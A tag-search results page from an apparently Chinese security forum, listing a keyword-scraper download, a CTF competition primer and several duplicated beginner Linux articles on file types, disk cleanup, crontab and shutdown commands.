跳转到帖子

搜索论坛

显示结果为标签'冷月博客'、'冷月'、'eumz.com'、'eumz'、'服务器'、'dell'、'ibm'、'hp'、'it'、'linux'、'网络技术'、'深信服'、'网络安全'或'华为服务器'。

  • 用标签来搜索

    用逗号分隔标签类型
  • 用作者来搜索

内容类型


论坛

  • 漏洞与黑客攻击防御安全领域
    • 黑客攻防业务合作
    • 世界黑客新闻动态
    • WEB和服务器安全漏洞
    • CHT漏洞数据库
    • Linux Kali高级学习教程
    • CTF&密码学与社会工程
    • 木马病毒分析
    • 黑客世界会员中心
  • 问题讨论中心
    • 问答中心
    • 交流中心
  • 编程开发
    • 各种编程技术
    • ios /安卓开发
  • CHT官方团队介绍及比赛制度
    • CTF攻防系统[供会员使用]
    • 积分商场
    • 积分跳马系统
    • 积分统计系统

产品组

  • Hacker attack and defense security hardware series
  • Internet Security Book Recommendations

博客

没有结果。

没有结果。

类别

  • Hacker Attack and Defense & Network Security Videos

查找结果在…

查找包含的结果…


创建日期

  • 开始

    结束


最后更新

  • 开始

    结束


按数量过滤…

注册日期

  • 开始

    结束


用户组


About Me

找到14个结果

  1. 版本 5.0.0

    1次下载

    LATEST KEYWORD SCRAPER BY XRISKY 更新的用户界面 您可以更改主题和样式 增加线程数并增加超时和重试 添加了更多搜索引擎 改进的抓取 关键字刮板的作用是什么? 关键字抓取工具是一种工具,可根据您的给定列表为您提供关键字列表。 例如,给出关键字“Fortnite”将建议 Fortnite 帐户、Fortnite 皮肤、Fortnite 瞄准机器人等 。换句话说,刮板会根据给定的单词或列表生成建议列表。它可能对您来说是一个方便的工具。 如何使用它? 删除您的关键字列表。 选择搜索引擎的数量。 输入线程数、重试和超时。 如果要使用,请启用代理(可选)。 保存结果。 使用此类程序时,请务必采取适当的预防措施! 至少使用沙盒; 使用 VPN
    免费
  2. 简介 中文一般译作夺旗赛(对大部分新手也可以叫签到赛),在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式 CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CHT 目前开发的是跟S2eTo共同研发的一套线上黑客攻防夺旗赛系统,截图如下。为了方便小白更好的学习进阶渗透测试,我们会不断更新。 竞赛模式 解题模式: 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 攻防模式: 在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激烈,具有很强观赏性和高度透明性的网络安全赛制。在这种赛制中,不仅仅是比参赛队员的智力和技术,也比体力(因为比赛一般都会持续48小时及以上),同时也比团队之间的分工配合与合作。 混合模式: 结合了解题模式与攻防模式的CTF赛制,比如参赛队伍通过解题可以获取一些初始分数,然后通过攻防对抗进行得分增减的零和游戏,最终以得分高低分出胜负。采用混合模式CTF赛制的典型代表如iCTF国际CTF竞赛。 总结 预选赛 都是线上比赛,比赛形式几乎都是解题模式。进入官方提供的网站,登录账号密码后会到一个页面,题目按类别分类(后续会讲有什么类别),点击后提供题目链接、题目信息、题目提示和flag(答案)提交,提交后会得到分数。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。 如:一道签到题,开始定的分为500,当有队伍提交正确的flag,那么分数就会下降,下降到470/450这样的,人数越多,分数下降幅度越大。而一血二血三血获得分数会高于后续答题正确的 总决赛 几乎都是线下赛,进行混合模式,因为攻防模式的题目容易出现易守难攻、比速度节题这种学习不到知识的问题,也因为这样,大部分的总决赛都是以逆向为主,很容易变成逆行大赛。那么像web选手去干吗呢?喝茶打杂去吧!刚学没多久,又比较懒,关于总决赛的都是在网上获取信息的,想了解详细的参考 第五届XCTF总决赛的赛制以及新型攻防赛题之探索 题目分类 题目一般为6大类: 1.Web(网络安全) Web是CTF竞赛中主要的题型之一,题目涉及到许多常见的WEB漏洞,诸如XSS、文件包含、代码执行、上传漏洞、SQL注入。也有一些简单的关于网络基础知识的考察,例如返回包、TCP-IP、数据包内容和构造。可以说题目环境比较接近真实环境。 所需知识点:PHP、Python、SQL(以mysql为主)、TCP-IP、linux命令、html、javascript等。 2.MISC(安全杂项) MISC是大型CTF竞赛的题目难度很大,是一个可以拉开分数的类型,而在小型竞赛和题库中却难度不大。题目涉及隐写术、流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广,主要考查参赛选手的各种基础综合知识。 所需知识点:熟悉使用众多隐写工具、流量审查工具、了解编码等。 3.Crypto(密码学) 主要包括古典密码学和现代密码学两部分内容,古典密码学趣味性强,种类繁多,现代密码学安全性高,对算法理解的要求较高。 所需知识点:矩阵、数论、古典密码学、算法等。 4.Reverse(逆向) 题目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译扎实功底。主要考查参赛选手的逆向分析能力。 所需知识点:汇编语言、加密与解密、常见反编译工具。 5.PWN(二进制安全) PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有栈溢出、堆溢出。主要考察参数选手对漏洞的利用能力。 所需知识点:C,OD+IDA,数据结构,操作系统。 6.Mobile(移动安全) 主要介绍了安卓逆向中的常用工具和主要题型,安卓逆向常常需要一定的安卓开发知识,iOS 逆向题目在 CTF 竞赛中较少出现,因此不作过多介绍。 7.(区块链) -近来多个CTF比赛均出现区块链题目,区块链应用越来越成为热门应用,在未来区块链会成为一个重点。因为没有接触过,这里不详细讲。
  3. 文件类型普通文件(regular file):就是一般存取的文件,由ls -al显示出来的属性中,第一个属性为 [-],例如 [-rwxrwxrwx]。另外,依照文件的内容,又大致可以分为: 1、纯文本文件(ASCII):这是Unix系统中最多的一种文件类型,之所以称为纯文本文件,是因为内容可以直接读到的数据,例如数字、字母等等。设 置文件几乎都属于这种文件类型。举例来说,使用命令“cat ~/. rc”就可以看到该文件的内容(cat是将文件内容读出来)。 2、二进制文件(binary):系统其实仅认识且可以执行二进制文件(binary file)。Linux中的可执行文件(脚本,文本方式的批处理文件不算)就是这种格式的。举例来说,命令cat就是一个二进制文件。 3、数据格式的文件(data):有些程序在运行过程中,会读取某些特定格式的文件,那些特定格式的文件可以称为 数据文件(data file)。举例来说,Linux在用户登入时,都会将登录数据记录在 /var/log/wtmp文件内,该文件是一个数据文件,它能通过last命令读出来。但使用cat时,会读出乱码。因为它是属于一种特殊格式的文件。 目录文件(directory):就是目录,第一个属性为 [d],例如 [drwxrwxrwx]。 连接文件(link):类似Windows下面的快捷方式。第一个属性为 [l],例如 [lrwxrwxrwx]。 设备与设备文件(device):与系统外设及存储等相关的一些文件,通常都集中在 /dev目录。通常又分为两种: 块设备文件:就是存储数据以供系统存取的接口设备,简单而言就是硬盘。例如一号硬盘的代码是 /dev/hda1等文件 。第一个属性为 [b]。字符设备文件:即串行端口的接口设备,例如键盘、鼠标等等。第一个属性为 [c]。 套接字(sockets):这类文件通常用在网络数据连接。可以启动一个程序来监听客户端的要求,客户端就可以通过套接字来进 行数据通信。第一个属性为 [s],最常在 /var/run目录中看到这种文件类型。 管道(FIFO,pipe):FIFO也是一种特殊的文件类型,它主要的目的是,解决多个程序同时存取一个文件所造成的错误。FIFO是  first-in-first-out(先进先出)的缩写。第一个属性为 [p]。 文件结构/:根目录,所有的目录、文件、设备都在/之下,/就是Linux文件系统的组织者,也是最上级的领导者。 /bin:bin 就是二进制(binary)英文缩写。在一般的系统当中,都可以在这个目录下找到linux常用的命令。系统所需要的那些命 令位于此目录。 /boot:Linux的内核及引导系统程序所需要的文件目录,比如 vmlinuz initrd.img 文件都位于这个目录中。在一般情况下,GRUB 或 LILO系统引导管理器也位于这个目录。 /cdrom:这个目录在刚刚安装系统的时候是空的。可以将光驱文件系统挂在这个目录下。例如:mount /dev/cdrom /cdrom /dev:dev 是设备(device)的英文缩写。这个目录对所有的用户都十分重要。因为在这个目录中包含了所有linux系统中使部设备。但是这里并不是放的外部设备的驱动程序。这一点和常用ows,dos操作系统不一样。它实际上是一个访问这些外部设备的端口。可以非常方便地去访问这些外部设备,和访问一个文件,一个目录没有任何区别。 /etc:etc这个目录是linux系统中最重要的目录之一。在这个目录下存放了系统管理时要用到的各种配置文件和子目录。要用到的 网络配置文件,文件系统,x系统配置文件,设备配置信息,设置用户信息等都在这个目录下。 /home:如果建立一个用户,用户名是”xx”,那么在/home目录下就有一个对应的/home/xx路径,用来存放用户的主目录。 /lib:lib是库(library)英文缩写。这个目录是用来存放系统动态连接共享库的。几乎所有的应用程序都会用到这个目录下的共享 库。因此,千万不要轻易对这个目录进行什么操作,一旦发生问题,系统就不能工作了。 /lost+found:在ext2或ext3文件系统中,当系统意外崩溃或机器意外关机,而产生一些文件碎片放在这里。当系统启动的过程中f sck工具会检查这里,并修复已经损坏的文件系统。有时系统发生问题,有很多的文件被移到这个目录中,可能会用 手工的方式来修复,或移到文件到原来的位置上。 /mnt:这个目录一般是用于存放挂载储存设备的挂载目录的,比如有cdrom等目录。可以参看/etc/fstab的定义。 /media:有些linux的发行版使用这个目录来挂载那些usb接口的移动硬盘(包括U盘)、CD/DVD驱动器等等。 /opt:这里主要存放那些可选的程序。 /proc:可以在这个目录下获取系统信息。这些信息是在内存中,由系统自己产生的。 /root:Linux超级权限用户root的家目录。 /sbin:这个目录是用来存放系统管理员的系统管理程序。大多是涉及系统管理的命令的存放,是超级权限用户root的可执行命令 存放地,普通用户无权限执行这个目录下的命令,这个目录和/usr/sbin; /usr/X11R6/sbin或/usr/local/sbin目录是相似的, 凡是目录sbin中包含的都是root权限才能执行的。 /selinux :对SElinux的一些配置文件目录,SElinux可以让linux更加安全。 /srv :服务启动后,所需访问的数据目录,举个例子来说,www服务启动读取的网页数据就可以放在/srv/www中 /tmp:临时文件目录,用来存放不同程序执行时产生的临时文件。有时用户运行程序的时候,会产生临时文件。/tmp就用来存放 临 时文件的。/var/tmp目录和这个目录相似。 /usr:这是linux系统中占用硬盘空间最大的目录。用户的很多应用程序和文件都存放在这个目录下。在这个目录下,可以找到那些 不适合放在/bin或/etc目录下的额外的工具 /usr/local:这里主要存放那些手动安装的软件,即不是通过“新立得”或apt-get安装的软件。它和/usr目录具有相类似的目录结构 。让软件包管理器来管理/usr目录,而把自定义的脚本(scripts)放到/usr/local目录下面、。 /usr/share :系统共用的东西存放地,比如 /usr/share/fonts 是字体目录,/usr/share/doc和/usr/share/man帮助文件。 /var:存放经常变动的文件。这个目录的内容是经常变动的,看名字就知道,可以理解为vary的缩写,/var下有/var/log 这是用来存 放系统日志的目录。/var/ www目录是定义Apache服务器站点存放目录;/var/lib 用来存放一些库文件,比如MySQL的,以 及 MySQL数据库的的存放地 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/113.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  4. 文件类型普通文件(regular file):就是一般存取的文件,由ls -al显示出来的属性中,第一个属性为 [-],例如 [-rwxrwxrwx]。另外,依照文件的内容,又大致可以分为: 1、纯文本文件(ASCII):这是Unix系统中最多的一种文件类型,之所以称为纯文本文件,是因为内容可以直接读到的数据,例如数字、字母等等。设 置文件几乎都属于这种文件类型。举例来说,使用命令“cat ~/. rc”就可以看到该文件的内容(cat是将文件内容读出来)。 2、二进制文件(binary):系统其实仅认识且可以执行二进制文件(binary file)。Linux中的可执行文件(脚本,文本方式的批处理文件不算)就是这种格式的。举例来说,命令cat就是一个二进制文件。 3、数据格式的文件(data):有些程序在运行过程中,会读取某些特定格式的文件,那些特定格式的文件可以称为 数据文件(data file)。举例来说,Linux在用户登入时,都会将登录数据记录在 /var/log/wtmp文件内,该文件是一个数据文件,它能通过last命令读出来。但使用cat时,会读出乱码。因为它是属于一种特殊格式的文件。 目录文件(directory):就是目录,第一个属性为 [d],例如 [drwxrwxrwx]。 连接文件(link):类似Windows下面的快捷方式。第一个属性为 [l],例如 [lrwxrwxrwx]。 设备与设备文件(device):与系统外设及存储等相关的一些文件,通常都集中在 /dev目录。通常又分为两种: 块设备文件:就是存储数据以供系统存取的接口设备,简单而言就是硬盘。例如一号硬盘的代码是 /dev/hda1等文件 。第一个属性为 [b]。字符设备文件:即串行端口的接口设备,例如键盘、鼠标等等。第一个属性为 [c]。 套接字(sockets):这类文件通常用在网络数据连接。可以启动一个程序来监听客户端的要求,客户端就可以通过套接字来进 行数据通信。第一个属性为 [s],最常在 /var/run目录中看到这种文件类型。 管道(FIFO,pipe):FIFO也是一种特殊的文件类型,它主要的目的是,解决多个程序同时存取一个文件所造成的错误。FIFO是  first-in-first-out(先进先出)的缩写。第一个属性为 [p]。 文件结构/:根目录,所有的目录、文件、设备都在/之下,/就是Linux文件系统的组织者,也是最上级的领导者。 /bin:bin 就是二进制(binary)英文缩写。在一般的系统当中,都可以在这个目录下找到linux常用的命令。系统所需要的那些命 令位于此目录。 /boot:Linux的内核及引导系统程序所需要的文件目录,比如 vmlinuz initrd.img 文件都位于这个目录中。在一般情况下,GRUB 或 LILO系统引导管理器也位于这个目录。 /cdrom:这个目录在刚刚安装系统的时候是空的。可以将光驱文件系统挂在这个目录下。例如:mount /dev/cdrom /cdrom /dev:dev 是设备(device)的英文缩写。这个目录对所有的用户都十分重要。因为在这个目录中包含了所有linux系统中使部设备。但是这里并不是放的外部设备的驱动程序。这一点和常用ows,dos操作系统不一样。它实际上是一个访问这些外部设备的端口。可以非常方便地去访问这些外部设备,和访问一个文件,一个目录没有任何区别。 /etc:etc这个目录是linux系统中最重要的目录之一。在这个目录下存放了系统管理时要用到的各种配置文件和子目录。要用到的 网络配置文件,文件系统,x系统配置文件,设备配置信息,设置用户信息等都在这个目录下。 /home:如果建立一个用户,用户名是”xx”,那么在/home目录下就有一个对应的/home/xx路径,用来存放用户的主目录。 /lib:lib是库(library)英文缩写。这个目录是用来存放系统动态连接共享库的。几乎所有的应用程序都会用到这个目录下的共享 库。因此,千万不要轻易对这个目录进行什么操作,一旦发生问题,系统就不能工作了。 /lost+found:在ext2或ext3文件系统中,当系统意外崩溃或机器意外关机,而产生一些文件碎片放在这里。当系统启动的过程中f sck工具会检查这里,并修复已经损坏的文件系统。有时系统发生问题,有很多的文件被移到这个目录中,可能会用 手工的方式来修复,或移到文件到原来的位置上。 /mnt:这个目录一般是用于存放挂载储存设备的挂载目录的,比如有cdrom等目录。可以参看/etc/fstab的定义。 /media:有些linux的发行版使用这个目录来挂载那些usb接口的移动硬盘(包括U盘)、CD/DVD驱动器等等。 /opt:这里主要存放那些可选的程序。 /proc:可以在这个目录下获取系统信息。这些信息是在内存中,由系统自己产生的。 /root:Linux超级权限用户root的家目录。 /sbin:这个目录是用来存放系统管理员的系统管理程序。大多是涉及系统管理的命令的存放,是超级权限用户root的可执行命令 存放地,普通用户无权限执行这个目录下的命令,这个目录和/usr/sbin; /usr/X11R6/sbin或/usr/local/sbin目录是相似的, 凡是目录sbin中包含的都是root权限才能执行的。 /selinux :对SElinux的一些配置文件目录,SElinux可以让linux更加安全。 /srv :服务启动后,所需访问的数据目录,举个例子来说,www服务启动读取的网页数据就可以放在/srv/www中 /tmp:临时文件目录,用来存放不同程序执行时产生的临时文件。有时用户运行程序的时候,会产生临时文件。/tmp就用来存放 临 时文件的。/var/tmp目录和这个目录相似。 /usr:这是linux系统中占用硬盘空间最大的目录。用户的很多应用程序和文件都存放在这个目录下。在这个目录下,可以找到那些 不适合放在/bin或/etc目录下的额外的工具 /usr/local:这里主要存放那些手动安装的软件,即不是通过“新立得”或apt-get安装的软件。它和/usr目录具有相类似的目录结构 。让软件包管理器来管理/usr目录,而把自定义的脚本(scripts)放到/usr/local目录下面、。 /usr/share :系统共用的东西存放地,比如 /usr/share/fonts 是字体目录,/usr/share/doc和/usr/share/man帮助文件。 /var:存放经常变动的文件。这个目录的内容是经常变动的,看名字就知道,可以理解为vary的缩写,/var下有/var/log 这是用来存 放系统日志的目录。/var/ www目录是定义Apache服务器站点存放目录;/var/lib 用来存放一些库文件,比如MySQL的,以 及 MySQL数据库的的存放地 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/113.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  5. 一:首先查看磁盘使用情况df linux中df命令详解 -a 显示所有文件系统的磁盘使用情况,包括0块(block)的文件系统,如/proc文件系统。 -k 以k字节为单位显示。 -i 显示i节点信息,而不是磁盘块。 -t 显示各指定类型的文件系统的磁盘空间使用情况。 -x 列出不是某一指定类型文件系统的磁盘空间使用情况(与t选项相反)。 -T 显示文件系统类型。 二:清理垃圾sudo apt-get autoclean #清理旧版本的软件缓存 sudo apt-get clean #清理所有软件缓存 sudo apt-get autoremove #删除系统不再使用的孤立软件 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/209.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  6. 一:首先查看磁盘使用情况df linux中df命令详解 -a 显示所有文件系统的磁盘使用情况,包括0块(block)的文件系统,如/proc文件系统。 -k 以k字节为单位显示。 -i 显示i节点信息,而不是磁盘块。 -t 显示各指定类型的文件系统的磁盘空间使用情况。 -x 列出不是某一指定类型文件系统的磁盘空间使用情况(与t选项相反)。 -T 显示文件系统类型。 二:清理垃圾sudo apt-get autoclean #清理旧版本的软件缓存 sudo apt-get clean #清理所有软件缓存 sudo apt-get autoremove #删除系统不再使用的孤立软件 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/209.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  7. 这几天论坛里面的小伙伴发了些linux下的一些命令,这里我做简单的归纳!在linux显示日历所用命令cal 使用: 显示2018年的日历 cal -y 2018 在linux显示天气预报所用命令wttr.in wttr.in是一个在线网站,根据ip地位将本地的天气预报已字符串的形式显示。 命令: curl wttr.inv 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/282.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  8. 这几天论坛里面的小伙伴发了些linux下的一些命令,这里我做简单的归纳!在linux显示日历所用命令cal 使用: 显示2018年的日历 cal -y 2018 在linux显示天气预报所用命令wttr.in wttr.in是一个在线网站,根据ip地位将本地的天气预报已字符串的形式显示。 命令: curl wttr.inv 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/282.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  9. 说明:很多时候我们的VPS运行脚本或者重启某些软件的时候都需要用到定时功能,这时候就要用到Crontab定时软件了,这里简单的说下安装和使用方法。 安装一般我们使用的Centos或者Debian都自带Crontab定时软件,如果没有,那我们就需要安装了。 1、centos安装crontab yum install vixie-cron crontabs #安装Crontab chkconfig crond on #设置开机启动Crontab service crond start #启动Crontab2、debian安装crontab apt-get install cron #安装Crontab /etc/init.d/cron restart #重启Crontab使用1、基本命令 crontab -e #编辑定时任务 crontab -r #移除定时任务 crontab -l #查看定时任务2、使用命令 添加的命令必须以如下格式: /root/rats.sh #前5个*指时间,后面为命令前5个*分别表示:分钟:0-59 小时:1-23 日期:1-31 月份:1-12 星期:0-6(0表示周日) 还可以用一些特殊符号: *: 表示任何时刻 ,: 表示分割 -:表示一个段,如:1-5,就表示1到5点 /n : 表示每个n的单位执行一次,如:*/1, 就表示每隔1个小时执行一次命令。也可以写成1-23/1 3、定时任务设置举例 21 * #21:43 执行05 * #05:15 执行17 * #17:00 执行17 1 #每周一的17:00 执行 0,10 17 0,2,3 #每周日,周二,周三的17:00和17:10 执行 0-10 17 1 #毎月1日从17:00到7:10毎隔1分钟 执行0 1,15 * 1 #毎月1日和15日和一日的0:00 执行4 1 #毎月1日的4:42分 执行21 1-6 #周一到周六21:00 执行 0,10,20,30,40,50   #每隔10分 执行 /10 * #每隔10分 执行1 * #从1:0到1:59每隔1分钟 执行1 * #1:00 执行/1 #毎时0分每隔1小时 执行毎时0分 执行8-20/3 * #8:02,11:02,14:02,17:02,20:02 执行5 1,15 #1日和15日的5:30 执行 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/347.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  10. 说明:很多时候我们的VPS运行脚本或者重启某些软件的时候都需要用到定时功能,这时候就要用到Crontab定时软件了,这里简单的说下安装和使用方法。 安装一般我们使用的Centos或者Debian都自带Crontab定时软件,如果没有,那我们就需要安装了。 1、centos安装crontab yum install vixie-cron crontabs #安装Crontab chkconfig crond on #设置开机启动Crontab service crond start #启动Crontab2、debian安装crontab apt-get install cron #安装Crontab /etc/init.d/cron restart #重启Crontab使用1、基本命令 crontab -e #编辑定时任务 crontab -r #移除定时任务 crontab -l #查看定时任务2、使用命令 添加的命令必须以如下格式: /root/rats.sh #前5个*指时间,后面为命令前5个*分别表示:分钟:0-59 小时:1-23 日期:1-31 月份:1-12 星期:0-6(0表示周日) 还可以用一些特殊符号: *: 表示任何时刻 ,: 表示分割 -:表示一个段,如:1-5,就表示1到5点 /n : 表示每个n的单位执行一次,如:*/1, 就表示每隔1个小时执行一次命令。也可以写成1-23/1 3、定时任务设置举例 21 * #21:43 执行05 * #05:15 执行17 * #17:00 执行17 1 #每周一的17:00 执行 0,10 17 0,2,3 #每周日,周二,周三的17:00和17:10 执行 0-10 17 1 #毎月1日从17:00到7:10毎隔1分钟 执行0 1,15 * 1 #毎月1日和15日和一日的0:00 执行4 1 #毎月1日的4:42分 执行21 1-6 #周一到周六21:00 执行 0,10,20,30,40,50   #每隔10分 执行 /10 * #每隔10分 执行1 * #从1:0到1:59每隔1分钟 执行1 * #1:00 执行/1 #毎时0分每隔1小时 执行毎时0分 执行8-20/3 * #8:02,11:02,14:02,17:02,20:02 执行5 1,15 #1日和15日的5:30 执行 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/347.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  11. 一般来说,用户的登录方式有三种: (1)命令行登录(2)ssh登录(3)图形界面登录 <?php echo "hellow"; ?>对于运行级别为5的图形方式用户来说,他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况:当我们看到mingetty的登录界面时,我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login,login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析:如果用户名不是 root,且存在 /etc/nologin 文件,login 将输出 nologin 文件的内容,然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录,如果不存在这个文件,则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制,如果不存在这个文件,则没有其他限制。点击下载 Default Primary Success Info Warning Danger图形模式与文字模式的切换方式Linux预设提供了六个命令窗口终端机让我们来登录。 默认我们登录的就是第一个窗口,也就是tty1,这个六个窗口分别为tty1,tty2 … tty6,你可以按下Ctrl + Alt + F1 ~ F6 来切换它们。 如果你安装了图形界面,默认情况下是进入图形界面的,此时你就可以按Ctrl + Alt + F1 ~ F6来进入其中一个命令窗口界面。 当你进入命令窗口界面后再返回图形界面只要按下Ctrl + Alt + F7 就回来了。 如果你用的vmware 虚拟机,命令窗口切换的快捷键为 Alt + Space + F1~F6. 如果你在图形界面下请按Alt + Shift + Ctrl + F1~F6 切换至命令窗口。 Linux 关机在linux领域内大多用在服务器上,很少遇到关机的操作。毕竟服务器上跑一个服务是永无止境的,除非特殊情况下,不得已才会关机。 正确的关机流程为:sync > shutdown > reboot > halt 关机指令为:shutdown ,你可以man shutdown 来看一下帮助文档。 例如你可以运行如下命令关机: sync 将数据由内存同步到硬盘中。 shutdown 关机指令,你可以man shutdown 来看一下帮助文档。例如你可以运行如下命令关机: shutdown –h 10 ‘This server will shutdown after 10 mins’ 这个命令告诉大家,计算机将在10分钟后关机,并且会显示在登陆用户的当前屏幕中。 shutdown –h now 立马关机 shutdown –h 20:25 系统会在今天20:25关机 shutdown –h +10 十分钟后关机 shutdown –r now 系统立马重启 shutdown –r +10 系统十分钟后重启 reboot 就是重启,等同于 shutdown –r nowhalt 关闭系统,等同于shutdown –h now 和 poweroff 最后总结一下,不管是重启系统还是关闭系统,首先要运行 sync 命令,把内存中的数据写到磁盘中。 关机的命令有 shutdown –h now halt poweroff 和 init 0 , 重启系统的命令有 shutdown –r now reboot init 6 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/746.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  12. 一般来说,用户的登录方式有三种: (1)命令行登录(2)ssh登录(3)图形界面登录 <?php echo "hellow"; ?>对于运行级别为5的图形方式用户来说,他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况:当我们看到mingetty的登录界面时,我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login,login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析:如果用户名不是 root,且存在 /etc/nologin 文件,login 将输出 nologin 文件的内容,然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录,如果不存在这个文件,则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制,如果不存在这个文件,则没有其他限制。点击下载 Default Primary Success Info Warning Danger图形模式与文字模式的切换方式Linux预设提供了六个命令窗口终端机让我们来登录。 默认我们登录的就是第一个窗口,也就是tty1,这个六个窗口分别为tty1,tty2 … tty6,你可以按下Ctrl + Alt + F1 ~ F6 来切换它们。 如果你安装了图形界面,默认情况下是进入图形界面的,此时你就可以按Ctrl + Alt + F1 ~ F6来进入其中一个命令窗口界面。 当你进入命令窗口界面后再返回图形界面只要按下Ctrl + Alt + F7 就回来了。 如果你用的vmware 虚拟机,命令窗口切换的快捷键为 Alt + Space + F1~F6. 如果你在图形界面下请按Alt + Shift + Ctrl + F1~F6 切换至命令窗口。 Linux 关机在linux领域内大多用在服务器上,很少遇到关机的操作。毕竟服务器上跑一个服务是永无止境的,除非特殊情况下,不得已才会关机。 正确的关机流程为:sync > shutdown > reboot > halt 关机指令为:shutdown ,你可以man shutdown 来看一下帮助文档。 例如你可以运行如下命令关机: sync 将数据由内存同步到硬盘中。 shutdown 关机指令,你可以man shutdown 来看一下帮助文档。例如你可以运行如下命令关机: shutdown –h 10 ‘This server will shutdown after 10 mins’ 这个命令告诉大家,计算机将在10分钟后关机,并且会显示在登陆用户的当前屏幕中。 shutdown –h now 立马关机 shutdown –h 20:25 系统会在今天20:25关机 shutdown –h +10 十分钟后关机 shutdown –r now 系统立马重启 shutdown –r +10 系统十分钟后重启 reboot 就是重启,等同于 shutdown –r nowhalt 关闭系统,等同于shutdown –h now 和 poweroff 最后总结一下,不管是重启系统还是关闭系统,首先要运行 sync 命令,把内存中的数据写到磁盘中。 关机的命令有 shutdown –h now halt poweroff 和 init 0 , 重启系统的命令有 shutdown –r now reboot init 6 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/746.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  13. 简介 中文一般译作夺旗赛(对大部分新手也可以叫签到赛),在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式 CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CHT 目前开发的是跟S2eTo共同研发的一套线上黑客攻防夺旗赛系统,截图如下。为了方便小白更好的学习进阶渗透测试,我们会不断更新。 竞赛模式 解题模式: 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 攻防模式: 在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激烈,具有很强观赏性和高度透明性的网络安全赛制。在这种赛制中,不仅仅是比参赛队员的智力和技术,也比体力(因为比赛一般都会持续48小时及以上),同时也比团队之间的分工配合与合作。 混合模式: 结合了解题模式与攻防模式的CTF赛制,比如参赛队伍通过解题可以获取一些初始分数,然后通过攻防对抗进行得分增减的零和游戏,最终以得分高低分出胜负。采用混合模式CTF赛制的典型代表如iCTF国际CTF竞赛。 总结 预选赛 都是线上比赛,比赛形式几乎都是解题模式。进入官方提供的网站,登录账号密码后会到一个页面,题目按类别分类(后续会讲有什么类别),点击后提供题目链接、题目信息、题目提示和flag(答案)提交,提交后会得到分数。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。 如:一道签到题,开始定的分为500,当有队伍提交正确的flag,那么分数就会下降,下降到470/450这样的,人数越多,分数下降幅度越大。而一血二血三血获得分数会高于后续答题正确的 总决赛 